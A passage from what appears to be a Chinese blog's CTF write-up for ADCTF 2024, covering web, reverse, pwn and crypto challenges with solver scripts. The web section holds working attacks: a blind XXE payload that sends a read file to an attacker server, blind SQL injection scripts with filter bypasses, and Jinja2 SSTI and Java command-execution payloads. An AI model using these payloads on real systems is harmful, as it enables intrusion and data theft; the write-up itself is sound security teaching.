","date":"2025年1月1日","externalUrl":null,"permalink":"/links/","section":"LINKS","summary":"小伙伴们的博客/主页地址","title":"LINKS","type":"links"},{"content":"","date":"2025年1月1日","externalUrl":null,"permalink":"/categories/page/","section":"Categories","summary":"","title":"page","type":"categories"},{"content":"","date":"2024年12月17日","externalUrl":null,"permalink":"/tags/about/","section":"Tags","summary":"","title":"about","type":"tags"},{"content":" 关于我是谁? # 2024级广东工业大学本科在读 A\u0026amp;D工作室成员 \u0026hellip;\u0026hellip; ","date":"2024年12月17日","externalUrl":null,"permalink":"/about/","section":"HOME","summary":"关于我是谁?","title":"ABOUT","type":"page"},{"content":" Web # xxe # jd-gui打开发现后门\n@GetMapping({\u0026#34;/backdoor\u0026#34;}) @ResponseBody public String hack(@RequestParam String fname) throws IOException, SAXException { DefaultResourceLoader resourceLoader = new DefaultResourceLoader(); byte[] content = resourceLoader.getResource(fname).getContentAsByteArray(); if (content != null) { XMLReader reader = XMLReaderFactory.createXMLReader(); reader.parse(new InputSource(new ByteArrayInputStream(content))); return \u0026#34;success\u0026#34;; } return \u0026#34;error\u0026#34;; } 传入fname,解析XML\n此处fname可控，可以传入外部XML\n构造XXE读取flag\n# eval.xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE ANY [ \u0026lt;!ENTITY % xd SYSTEM \u0026#34;http://LINK_TO_YOUR_SERVER/eval.dtd\u0026#34;\u0026gt; %xd; ]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;bbbb;\u0026amp;demo;\u0026lt;/root\u0026gt; # eval.dtd \u0026lt;!ENTITY % aaaa SYSTEM \u0026#34;file:///flag\u0026#34;\u0026gt; \u0026lt;!ENTITY % demo \u0026#34;\u0026lt;!ENTITY bbbb SYSTEM \u0026#39;http://LINK_TO_YOUR_SERVER/?file=%aaaa;\u0026#39;\u0026gt;\u0026#34;\u0026gt; %demo; 在本地监听http请求\npython3 -m http.server 9000 发起请求触发XXE\nhttp://TARGET:33008/backdoor?fname=http://LINK_TO_YOUR_SERVER/eval.xml\n在请求日志中得到flag\n120.230.56.2 - - [30/Nov/2024 23:03:20] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:20] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:40] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:40] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:04:08] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:04:08] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /?file=ADCTF{WOW_Y0u_Kn0w_H0w_to_use_Blind_XXE} HTTP/1.1\u0026rdquo; 200 -\nADCTF{WOW_Y0u_Kn0w_H0w_to_use_Blind_XXE}\nsql1 # 从POST(data)传入student的序列化字符串，过滤之后查询$student\n$black_list = \u0026#39;/\\=|\\\\x20|\\\\n|union|substr|ascii|\\//i\u0026#39;; 过滤了union,ascii,substr,空格,等号,换行符\n无法使用union注入，ascii使用ord替换，substr使用mid替换,空格可以用制表符替换,等号用like替换（其实用不到）\n这题还是有回显，布尔盲注直接脚本跑一遍\nimport httpx import readline import html import re import urllib.parse target = \u0026#39;http://TARGET:33001/\u0026#39; passphrase = \u0026#39;C H A N G E M E\u0026#39; def exp(payload: str, out:bool): payload = f\u0026#34;Alice\u0026#39;\u0026amp;\u0026amp; {payload} #\u0026#34; payload = payload.replace(\u0026#39;=\u0026#39;, \u0026#39; like \u0026#39;) payload = payload.replace(\u0026#39; \u0026#39;,\u0026#39;\\t\u0026#39;) payload = { \u0026#39;data\u0026#39;: \u0026#39;O:7:\u0026#34;Student\u0026#34;:1:{s:12:\u0026#34;student_name\u0026#34;;s:\u0026#39;+\u0026#34;{}\u0026#34;.format(len(payload))+\u0026#39;:\u0026#34;\u0026#39;+payload+\u0026#39;\u0026#34;;}\u0026#39; } auth = httpx.BasicAuth(\u0026#39;user\u0026#39;, passphrase) r = httpx.post(target, data=payload,auth=auth,timeout=60) pattern = r\u0026#39;\u0026lt;/code\u0026gt;(.*)\u0026#39; result = re.search(pattern, r.text) # if out: # print(result.group(1)) if(\u0026#39;Alice\u0026#39; in result.group(1)): if(out): print(True) return True elif (\u0026#39;no\u0026#39; in result.group(1)): print(\u0026#39;**Filtered**\u0026#39;) print(payload) else: if(out): print(False) return False if __name__ == \u0026#39;__main__\u0026#39;: result = \u0026#39;\u0026#39; sql = \u0026#34;(select group_concat(secret_value) from secrets)\u0026#34; length = 88 for i in range(1,length + 1): left = 0 right = 127 while right - left \u0026gt; 1: mid = int((left+right)/2) print(f\u0026#39;[{i}] {left} {right} \u0026#39;,end=\u0026#39;\\r\u0026#39;) payload = f\u0026#39;ord(mid({sql},{i},1)) \u0026gt; {mid}\u0026#39; if(exp(payload, False)): left = mid else: right = mid print(f\u0026#39;{chr(right)} {right} [{i}/{length}]\u0026#39;) result += chr(right) print(result) while True: exp(input(\u0026#39;\u0026gt; \u0026#39;), True) flag{53048e06-1dbe-423b-8cf8-458ccd591a58}\nsql2 # 和sql1一样，唯一不同就是没有回显，采用时间盲注\nimport httpx import readline import html import re import urllib.parse from datetime import datetime import time target = \u0026#39;http://TARGET:33004/\u0026#39; passphrase = \u0026#39;02e9f90e494fe5a2727176f6952abc99\u0026#39; def exp(payload: str, out:bool): # build payload payload = f\u0026#34;Alice\u0026#39;\u0026amp;\u0026amp; IF({payload},SLEEP(1),2) #\u0026#34; # bypass detect payload = payload.replace(\u0026#39;=\u0026#39;, \u0026#39; like \u0026#39;) payload = payload.replace(\u0026#39; \u0026#39;,\u0026#39;\\t\u0026#39;) payload = { \u0026#39;data\u0026#39;: \u0026#39;O:7:\u0026#34;Student\u0026#34;:1:{s:12:\u0026#34;student_name\u0026#34;;s:\u0026#39;+\u0026#34;{}\u0026#34;.format(len(payload))+\u0026#39;:\u0026#34;\u0026#39;+payload+\u0026#39;\u0026#34;;}\u0026#39; } # Start Quere auth = httpx.BasicAuth(\u0026#39;user\u0026#39;, passphrase) Time = datetime.now() r = httpx.post(target, data=payload,auth=auth,timeout=60) Time = datetime.now() - Time # process result if (out): print(f\u0026#39;Cost: {Time}\u0026#39;) pattern = r\u0026#39;\u0026lt;/code\u0026gt;(.*)\u0026#39; result = re.search(pattern, r.text) if (\u0026#39;no\u0026#39; in result.group(1)): print(\u0026#39;**Filtered**\u0026#39;) print(payload) if (Time.seconds \u0026gt; 5): print(\u0026#34;WARNING: SPEED LIMIT HAPPEDED\u0026#34;) print(payload) if (Time.seconds \u0026gt; 1): if (out): print (True) return True if (out): print(False) return False if __name__ == \u0026#39;__main__\u0026#39;: result = \u0026#39;\u0026#39; sql = \u0026#34;(select group_concat(secret_value) from secrets)\u0026#34; length = 88 for i in range(1,length + 1): left = 0 right = 127 while right - left \u0026gt; 1: mid = int((left+right)/2) print(left,right,end=\u0026#39;\\r\u0026#39;) payload = f\u0026#39;ord(mid({sql},{i},1)) \u0026gt; {mid}\u0026#39; if(exp(payload, False)): left = mid else: right = mid time.sleep(0.1) print(f\u0026#39;{chr(right)} {right} [{i}/{length}]\u0026#39;) result += chr(right) print(result) while True: exp(input(\u0026#39;\u0026gt; \u0026#39;), True) flag{2572e0bf-30d1-4c8d-b512-6ded054f21a6}\nsst1 # 访问目标地址得到网站源代码\nfrom flask import Flask, request, render_template_string from hashlib import md5 app = Flask(__name__) black_list = [\u0026#39;[\u0026#39;,\u0026#39;\\\u0026#39;\u0026#39;] def waf(name): for x in black_list: if x in name.lower(): print(x) return True return False @app.route(\u0026#39;/\u0026#39;) def index(): return open(__file__).read() @app.post(\u0026#39;/exp\u0026#39;) def user(): exp = request.form.get(\u0026#34;exp\u0026#34;) digest = request.form.get(\u0026#34;digest\u0026#34;) if not exp: return \u0026#39;need exp\u0026#39; if not digest: return \u0026#39;need digest\u0026#39; if not digest == md5(exp.encode()).hexdigest(): return \u0026#39;digest not match\u0026#39; if waf(exp): return \u0026#34;No hacker\u0026#34; return render_template_string(exp) if __name__ == \u0026#39;__main__\u0026#39;: app.run(\u0026#34;0.0.0.0\u0026#34;, port=11111) 模板注入漏洞出现在/exp路由\n可以看见过滤了中括号和反斜线\n构造payload\n{{().__class__.__base__.__subclasses__().__getitem__(137).__init__.__globals__.__builtins__.__getitem__(\u0026#34;eval\u0026#34;)(\u0026#34;__import__(\\\u0026#34;os\\\u0026#34;).popen(\\\u0026#34;cat flag\\\u0026#34;).read()\u0026#34;)}} 执行得到flag\nflag{a8e5f202-9aac-49b8-ad8f-7fa2c0ac8130}\nsst2 # 讲真的，这个ssti绕过真是一窍不通，搞了一天都没搞出来，允许我当一次脚本小子吧\n使用 fenjing 构造payload，然后手动构造一下请求\nMarven11/Fenjing 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF, designed for CTF Python 1160 74 import httpx import html import readline from hashlib import md5 import fenjing target = \u0026#39;http://TARGET:33008/exp\u0026#39; # target = \u0026#39;http://127.0.0.1:11111/exp\u0026#39; passphrase = \u0026#39;7f036f4d2e2986b8bbdc89187aabf82d\u0026#39; black_list = [\u0026#39;\\\u0026#39;\u0026#39;,\u0026#39;\u0026#34;\u0026#39;,\u0026#39;lipsum\u0026#39;,\u0026#39;.\u0026#39;,\u0026#39;[\u0026#39;] def waf(name): for x in black_list: if x in name.lower(): # print(x) return False return True def exp(payload): shell_payload, _ = fenjing.exec_cmd_payload(waf, payload) auth = httpx.BasicAuth(username=\u0026#34;user\u0026#34;, password=passphrase) data = { \u0026#39;exp\u0026#39;: shell_payload, \u0026#39;digest\u0026#39;:md5(shell_payload.encode()).hexdigest() } r = httpx.post(target,data=data,auth=auth) print(f\u0026#39;[+] Payload: {shell_payload}\u0026#39;) print(html.unescape(r.text)) if __name__ == \u0026#39;__main__\u0026#39;: while True: exp(input(\u0026#39;\u0026gt; \u0026#39;)) flag{56199a9d-6772-4f27-b78a-9a40f9056db4}\nlottery # 在events/2.json中发现Base64字符串\nZmxhZ3thY2FlNTkwMC1hNDg4LTQ0YzUtYWM0YS0wNmYzMTM5Y2NjZWR9Cg==\n解码得到flag\nflag{acae5900-a488-44c5-ac4a-06f3139ccced}\nSign_in_ADCTF # 看见源代码里面提示\n\u0026lt;!-- H1NT: 调用Sign_in_AD()来完成签到 --\u0026gt; 打开控制台，在网页刷新的时候执行Sign_in_AD()\n看到提示:\n签到成功!但flag在图片里面哦^V^\n将图片下载下来丢到kali里面查看EXIF信息:\nEXIF tags in \u0026lsquo;./sign.jpg\u0026rsquo; (\u0026lsquo;Motorola\u0026rsquo; byte order): \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;- Tag |Value \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;- Artist |Ak1yamaM1O XP Comment |关注ad工作室公众号，后台发送“ADCTF2024”即可得到flag XP Author |Ak1yamaM1O Padding |268 bytes undefined data X-Resolution |72 Y-Resolution |72 Resolution Unit |Inch Padding |268 bytes undefined data Exif Version |Exif Version 2.1 FlashPixVersion |FlashPix Version 1.0 Color Space |Uncalibrated \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;-\n按照提示操作得到flag\nflag{We1c0me_2o_ADCTF_2O24_H4V4_6o09_t1m3}\nonlineJava # 没有任何技巧，直接执行shell\ntry { String command = \u0026#34;cat /flag\u0026#34;; Process process = Runtime.getRuntime().exec(command); java.io.InputStream inputStream = process.getInputStream(); java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } process.waitFor(); } catch (Exception e) { e.printStackTrace(); } Reverse # checkin # IDA 打开发现是一个异或加密 加密使用的是随机数 但是随机数种子已经被指定了 所以每次得到的随机数都是一样的\n用LazyIDA提取加密后的flag\nencoded = \u0026#34;\\x55\\x17\\xC9\\xBB\\x4A\\xA5\\x86\\xDF\\x24\\x0A\\x1C\\xA3\\x27\\xA1\\x57\\x35\\xC3\\xDB\\x91\\x88\\x6D\\x91\\xA0\\xCC\\x71\\x57\\x71\\xE4\\x40\\x00\u0026#34;; 编写解密脚本:\n#include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; int main(){ srand(0x7E8u); char s[] = \u0026#34;\\x55\\x17\\xC9\\xBB\\x4A\\xA5\\x86\\xDF\\x24\\x0A\\x1C\\xA3\\x27\\xA1\\x57\\x35\\xC3\\xDB\\x91\\x88\\x6D\\x91\\xA0\\xCC\\x71\\x57\\x71\\xE4\\x40\\x00\u0026#34;; for ( int i = 0; i \u0026lt;= 28; ++i ) s[i] ^= rand(); puts(s); return 0; } flag{y0u_Know_rAnd0m_4nd_xOr}\nezPy # 瞪眼法看图标一眼Python（看题目也知道）\n直接丢pyinstxtractor得到pyc\n再丢pylingual反汇编pyc\n# Decompiled with PyLingual (https://pylingual.io) # Internal filename: main.py # Bytecode version: 3.9.0beta5 (3425) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import sys secret = [631, 1205, -500, 1021, 1879, 668, -281, 1651, 1326, 593, 428, -170, 515, 1302, 452, 41, 814, 379, 382, 629, 650, 273, 1529, 630, 418, 1207, 1076, 315, 1118, 469, 398, 1803, 647, 729, 1439, 1104] flag = input(\u0026#39;Please enter the flag:\u0026#39;) flag = [ord(c) for c in flag] if len(flag) != 36: print(\u0026#39;Wrong flag length\u0026#39;) sys.exit() encoded = [0 for _ in range(36)] for i in range(0, 36, 9): encoded[i] = 3 * flag[i] + 7 * flag[i + 1] - 2 * flag[i + 2] + 5 * flag[i + 3] - 6 * flag[i + 4] - 14 encoded[i + 1] = -5 * flag[i + 1] + 9 * flag[i + 2] + 4 * flag[i + 3] - 3 * flag[i + 4] + 7 * flag[i + 5] - 18 encoded[i + 2] = 6 * flag[i + 0] - 4 * flag[i + 1] + 2 * flag[i + 2] - 9 * flag[i + 5] + 5 * flag[i + 6] - 25 encoded[i + 3] = 7 * flag[i + 1] + 3 * flag[i + 3] - 8 * flag[i + 4] + 6 * flag[i + 5] - 2 * flag[i + 6] + 4 * flag[i + 7] - 30 encoded[i + 4] = 2 * flag[i + 0] + 5 * flag[i + 2] - 4 * flag[i + 4] + 7 * flag[i + 5] + 9 * flag[i + 8] - 20 encoded[i + 5] = 8 * flag[i + 0] - 3 * flag[i + 1] + 5 * flag[i + 3] - 6 * flag[i + 7] + 2 * flag[i + 8] - 19 encoded[i + 6] = -7 * flag[i + 1] + 4 * flag[i + 2] - 5 * flag[i + 5] + 3 * flag[i + 6] + 6 * flag[i + 8] - 22 encoded[i + 7] = 9 * flag[i + 0] + 2 * flag[i + 2] + 6 * flag[i + 3] - 4 * flag[i + 6] + 5 * flag[i + 7] - 3 * flag[i + 8] - 27 encoded[i + 8] = 4 * flag[i + 0] - 5 * flag[i + 4] + 7 * flag[i + 5] + 3 * flag[i + 6] + 9 * flag[i + 7] - 2 * flag[i + 8] - 33 if encoded == secret: print(\u0026#39;Correct!\u0026#39;) else: print(\u0026#39;Wrong!\u0026#39;) 这么复杂的东西直接丢z3求解\nfrom z3 import * solver = Solver() flag = [Int(f\u0026#39;flag_{i}\u0026#39;) for i in range(36)] secret = [631, 1205, -500, 1021, 1879, 668, -281, 1651, 1326, 593, 428, -170, 515, 1302, 452, 41, 814, 379, 382, 629, 650, 273, 1529, 630, 418, 1207, 1076, 315, 1118, 469, 398, 1803, 647, 729, 1439, 1104] solver.add([flag[i] \u0026gt;= 0 for i in range(36)]) solver.add([flag[i] \u0026lt;= 255 for i in range(36)]) for i in range(0, 36, 9): solver.add(3 * flag[i] + 7 * flag[i + 1] - 2 * flag[i + 2] + 5 * flag[i + 3] - 6 * flag[i + 4] - 14 == secret[i]) solver.add(-5 * flag[i + 1] + 9 * flag[i + 2] + 4 * flag[i + 3] - 3 * flag[i + 4] + 7 * flag[i + 5] - 18 == secret[i + 1]) solver.add(6 * flag[i + 0] - 4 * flag[i + 1] + 2 * flag[i + 2] - 9 * flag[i + 5] + 5 * flag[i + 6] - 25 == secret[i + 2]) solver.add(7 * flag[i + 1] + 3 * flag[i + 3] - 8 * flag[i + 4] + 6 * flag[i + 5] - 2 * flag[i + 6] + 4 * flag[i + 7] - 30 == secret[i + 3]) solver.add(2 * flag[i + 0] + 5 * flag[i + 2] - 4 * flag[i + 4] + 7 * flag[i + 5] + 9 * flag[i + 8] - 20 == secret[i + 4]) solver.add(8 * flag[i + 0] - 3 * flag[i + 1] + 5 * flag[i + 3] - 6 * flag[i + 7] + 2 * flag[i + 8] - 19 == secret[i + 5]) solver.add(-7 * flag[i + 1] + 4 * flag[i + 2] - 5 * flag[i + 5] + 3 * flag[i + 6] + 6 * flag[i + 8] - 22 == secret[i + 6]) solver.add(9 * flag[i + 0] + 2 * flag[i + 2] + 6 * flag[i + 3] - 4 * flag[i + 6] + 5 * flag[i + 7] - 3 * flag[i + 8] - 27 == secret[i + 7]) solver.add(4 * flag[i + 0] - 5 * flag[i + 4] + 7 * flag[i + 5] + 3 * flag[i + 6] + 9 * flag[i + 7] - 2 * flag[i + 8] - 33 == secret[i + 8]) if solver.check() == sat: model = solver.model() flag_result = \u0026#39;\u0026#39;.join(chr(model[flag[i]].as_long()) for i in range(36)) print(f\u0026#34;Flag: {flag_result}\u0026#34;) else: print(\u0026#34;No solution found\u0026#34;) flag{y0U_4rE_r3@1ly_g0o0oOd_At_m4Th}\nPy_revenge # 瞪眼法Python（看题目看的）\npyinstxtractor + PyLingual得到源代码\n# Decompiled with PyLingual (https://pylingual.io) # Internal filename: main.py # Bytecode version: 3.12.0rc2 (3531) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import base64 secret = [27, 40, 57, 63, 24, 4, 66, 4, 100, 122, 8, 27, 21, 122, 4, 15, 122, 20, 17, 98, 25, 115, 55, 82, 74, 71, 23, 20, 9, 26, 28, 105, 95, 34, 90, 46] flag = input(\u0026#39;Please enter the flag:\u0026#39;) flag = base64.b64encode(flag.encode()).decode() flag = [ord(c) for c in flag] key = \u0026#39;ADCTF2024\u0026#39; for i in range(len(flag)): flag[i] ^= ord(key[i % len(key)]) flag[i] ^= i if flag == secret: print(\u0026#39;Correct!\u0026#39;) else: print(\u0026#39;Wrong!\u0026#39;) 看样子是异或+Base64\n直接把东西丢进去再异或一次然后解码Base64\nimport base64 secret = [27, 40, 57, 63, 24, 4, 66, 4, 100, 122, 8, 27, 21, 122, 4, 15, 122, 20, 17, 98, 25, 115, 55, 82, 74, 71, 23, 20, 9, 26, 28, 105, 95, 34, 90, 46] key = \u0026#39;ADCTF2024\u0026#39; result = \u0026#39;\u0026#39; for i in range(len(secret)): secret[i] ^= i secret[i] ^= ord(key[i % len(key)]) result += chr(secret[i]) print(base64.b64decode(result).decode()) Pwn # binsh # IDA 打开发现只能输入两个字符 如果第二个字符为h(104)就替换为b(98)\n刚开始没有任何头绪，思来想去不知道为什么第二个字符会出现h\n结果想起来了sh\n把sh换成sb，真够损的\n再想发现$0也是可以调用shell的\n直接秒了\nflag{583b4daf-a393-4bcd-b93e-2100c2ce77d6}\nmeow # 脚本题没什么好说的喵~\nfrom pwn import * li = lambda x : print(\u0026#39;\\x1b[01;38;5;214m\u0026#39; + str(x) + \u0026#39;\\x1b[0m\u0026#39;) ll = lambda x : print(\u0026#39;\\x1b[01;38;5;1m\u0026#39;+ str(x) + \u0026#39;\\x1b[0m\u0026#39;) def dbg(p : process): gdb.attach(p, \u0026#39;source ~/Programs/pwndbg/gdbinit.py\u0026#39;) # Config LOCAL = False file = \u0026#39;./meow\u0026#39; remote_addr = \u0026#39;0.0.0.0\u0026#39; remote_port = 65535 context.log_level=\u0026#39;DEBUG\u0026#39; # [\u0026#39;CRITICAL\u0026#39;, \u0026#39;DEBUG\u0026#39;, \u0026#39;ERROR\u0026#39;, \u0026#39;INFO\u0026#39;, \u0026#39;NOTSET\u0026#39;, \u0026#39;WARNING\u0026#39;] elf = ELF(file) context.binary = elf def get_Process(): if LOCAL: p = process(file) else: p = remote(remote_addr ,remote_port) p.sendlineafter(b\u0026#39;Type your passphrase: \u0026#39;, b\u0026#39;passphrase\u0026#39;) return p def exp(): p = get_Process() # p.interactive() # Real Start of EXP p.sendlineafter(\u0026#34;请回复\u0026#39;喵~\u0026#39;开始\\n\u0026#34;.encode(), \u0026#39;喵~\u0026#39;.encode()) while True: payload = p.recvline().decode()[:-1] print(payload) if (payload[-1] == \u0026#39;?\u0026#39;): payload = payload[:-1] + \u0026#39;喵?\u0026#39; elif (payload[-1] == \u0026#39;!\u0026#39;): payload = payload[:-1] + \u0026#39;喵!\u0026#39; else: payload = payload + \u0026#39;喵~\u0026#39; print(payload) p.sendlineafter(\u0026#39;请输入:\u0026#39;.encode(),payload.encode()) p.interactive() if __name__ == \u0026#39;__main__\u0026#39;: exp() flag{d8facb39-2990-4efa-9649-9c7242acaa5d}喵~\nCrypto # Use_Many_Time # 板子题，没什么好说的\n至于p是哪来的，我想是factordb给我的\nfrom Crypto.Util.number import * n = 271472624424656513785706923680771932133715054033425980394077073568817784367419534373403335781047213279328099684778631075010020852340363239109929257593123636490472788742710500691829271154406656967499570620808599990809022444747721621226472999098447873973754640477256467566021323433300316782379572843249101957097476171914061796763882160221810752037588477825281339421214989804806106422337645286183603182582435570582060051797114488129892907097969025919044345960281472097528350236904382867201532480293547156397634024888874181247945486724100923198368861164414053799229573809643496189560293961228262358439897447721272077026577955596476378495555781331390802631948596505810532333928413691919085783591350817862501247468922625100225243353014466352465524402884992557288475473449673329173477799355005388403603540849669807448000951133101061837473065442841126173160221586401667999743065475436042231713071217028338553851930804379457014815136497217622172942725789731656487365400662759041673246263952305177330273165040055678540346032835777756018333782404380070921037783724200080770052468396586141345852821959354352496376533002799798666280242749703930834932216393024552332394747366870653579192862981203841223970368967884378029041333485930753022670356279089241919852655226148387261758145662448291834484689828355196376588241880452162468344771724832727747146706203875543683244719198324124061667256741010066117105718405978693348972717642194095091616302700592766673624550504917867603634542541368375740266071937725051550575451618436991290662488896868128637569245079892637758352664528618064223657481155853608868600031926390171851091738102791194299611556416648756888113654937238624189138830880418480962906152416654876445398057632196937986995992085822575718165073591892866350194485467016785653412183994633115928254714676975956375674614875957033175065090009966949952689186250766814233600527752382571007342869177096365187528130392174264920694275768322770528821969405178452047175169237214071424708443772771459072348156584802498912079521950348331820925988369966076070172436223669851674684504470256163223470647039446081938764730223121989464510919117939913290460289762676092275797366737539534123024502760506615782714363240028877215121539549927135722120154270580276684945221133223162306832578280630822912653337205489280151793861613547764311383072014368485459881701386311716195796935045277483356584921699345142082381019935250848231570451880495222569509469558179017999387883489730684745699017658729849361 c = 262959409928901942946356967282715685988402717525722998413073199552344194569815462675208727317356069038143476887785349729074152415468561305043719564044443534943678461691194112819829009942015928217138669440068055198678626228169095209700084857903899952032493859312798134830127847836090483339421488013318184521018942602658859674923143870041870487415119261615851991532534606572685371087892175187669735837173802901707243259478231127246547498003861531872712139399220445465633130401043038236189470250375275092537677136076465523278093135254194321212116731237463794930347080005994129860018818529190275740308829411887853496055005914245757890730455096895759851033070483269010908006762902321856837578539257154697504866923667155835568667100011559417194297036546745102722888382810645788593405822297665771079070110912560494209334914533558309387853851664235646634342550739566564027709387611635084010476988602665679274092312701989498548485452833766131120307212434583895800389361158177620204656479294383838488961384696760004965555832729706574445815485286337177591334864985323203962452816823109401292600686290645753703318285223851373494687341332009673985128472618489951377449004314976075061089812435706552393436214957004589524906307287978580991550974217938678109879592869816607502026007252288475327472451287082697741140324509606631465050160462644047707063687221390874129122094235339213836858331145379658693745765989963094532579285786465378971800497606443969187141241371884417409400393554875676670693772124227967787087249970176123360898925123323833553629516940180273052472844245188596972497171407972537936080054594306016800782067609134239410680549083033727692776112628144869503299586655898231079773579227330327159838200652203600435140335585943871110523667774597723803449181446601397378968006674324753246013580929038935474151143294980592601911423698794436171646021633991328190789552835952437637863496011173604086905984318805710258969051632322326111378923301936151648733712292832400228718852555700089350581693206572448860973715415938816675920101336567495654357573191994730856103857549775016982813567025601029715927459867603513676152935188298681539416993775403152002836985599653470480800354152755275582198243528888697069870892345692931591655818148732228227890569700323009808337822568147429445530219871559528924454126891741517141491673059521896789132434077118608327133800491064640223646492279791064413028951228474075277822487467158841147454754127758427097085005104226495027785164273717534964 p = 22826089215015062971239747479765573980261860956508924966887672339011131256071593933855569627345730491900186620681430083447450449800363453742460910559038500884300216627993746389795089330113851499728923389157896774203901873995580499872010382271176165914123608852269645266420541883312655519483268190334714005528424143016351241964111694448438696041108115955227931375862495974220469117197567953528127044121313985354817794430503700199549401649666484648419628490258677717450705269977839872907619635351260327914403045603763386492257545870697934887022012834074741429555229113461953163363204273114559929014526316520808246516691 e = 65537 phi_n = p**3 * (p - 1) d = inverse(e, phi_n) m = pow(c, d, n) plaintext = long_to_bytes(m) print(plaintext) flag{another_weird_construction}\nToo_Close_To_Sqrt # 两个相邻的质数，说明我们开个方pq就在旁边,直接跑一会就出来了\nfrom gmpy2 import isqrt from Crypto.Util.number import * n = 77110253337392483710762885851693115398718726693715564954496625571775664359421696802771127484396119363821442323280817855193791448966346325672454247192244603281463595140923987182065095198239715749980911991399313395478292871386248479783966672279960117003211050451721307589036878362258617072298763845707881171743025954660306653186069633961424298647787491228085801739935823867940079473418881721402983930102278146132444200918211570297746753023639071980907968315022004518691979622641358951345391364430806558132988012728594904676117146959007388204192026655365596585273466096578234688721967922267682066710965927143418418189061 c = 702169486130185630321527556026041034472676838451810139529487621183247331904842057079283224928768517113408797087181581480998121028501323357655408002432408893862758626561073997320904805861882437888050151254177440453995235705432462544064680391673889537055043464482935772971360736797960328738609078425683870759310570638726605063168459207781397030244493359714270821300687562579988959673816634095712866030123140597773571541522765682883740928146364852979096568241392987132397744676804445290807040450917391600712817423804313823998912230965373385456071776639302417042258135008463458352605827748674554004125037538659993074220 e = 65537 p = isqrt(n) while n % p != 0: p += 1 q = n // p phi_n = (p-1)*(q-1) d = inverse(e,phi_n) m = pow(c, d, n) print(long_to_bytes(m)) flag{oops_the_N_is_not_secure}\nOne_Way_Function # 只有单个字符的sha512\n直接来一手彩虹表\nfrom hashlib import sha512 charset = \u0026#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_{}\u0026#39; rainbow_table = {} for c in charset: rainbow_table[sha512(c.encode()).hexdigest()] = c hashes = [ \u0026#39;711c22448e721e5491d8245b49425aa861f1fc4a15287f0735e203799b65cffec50b5abd0fddd91cd643aeb3b530d48f05e258e7e230a94ed5025c1387bb4e1b\u0026#39;, \u0026#39;f10127742e07a7705735572f823574b89aaf1cbe071935cb9e75e5cfeb817700cb484d1100a10ad5c32b59c3d6565211108aa9ef0611d7ec830c1b66f60e614d\u0026#39;, ...... ] flag = \u0026#39;\u0026#39; for hash in hashes: if hash in rainbow_table: flag += rainbow_table[hash] else: print(f\u0026#34;{hash} not found\u0026#34;) print(flag) flag{d4d07133-d6bb-4add-b194-8c8eec4bb33f}\nOne_Key_pad # from secret import flag, key ciphertext = [] for f in flag: ciphertext.append((f ^ key)) print(bytes(ciphertext).hex()) e0eae7e1fde3e7fcffd9fee9f4fb 看到flag是逐字节加密的，密钥只有256种可能，直接枚举密钥即可\nciphertext = bytes.fromhex(\u0026#39;e0eae7e1fde3e7fcffd9fee9f4fb\u0026#39;) for key in range(0xff): flag = b\u0026#39;\u0026#39; for c in ciphertext: flag += bytes([c^key]) if flag.startswith(b\u0026#39;flag{\u0026#39;): print(flag.decode()) exit() Check_Your_Factor_Database # FactorDB\nfrom Crypto.Util.number import * n = 15583202069585885743329731770693703651315744619547748987654328267750897298525457052637246322711018450296389785154280944187494218432166414466847580546888232777346390261326052791442303045476056323506639620708060686276665740035963899932923469306092864734507521103929958343335077640138132147823877965255516681640595305323863184079626094607124637572731263072411094986661513874040186660293323912225991096820508525802441998965552628844336066341624032465148749156118031186277077034218599879172143727672732486930547036361186338853567795815703079141657486772887537131798381857481761128761701947613223163957583789997131996194389 c = 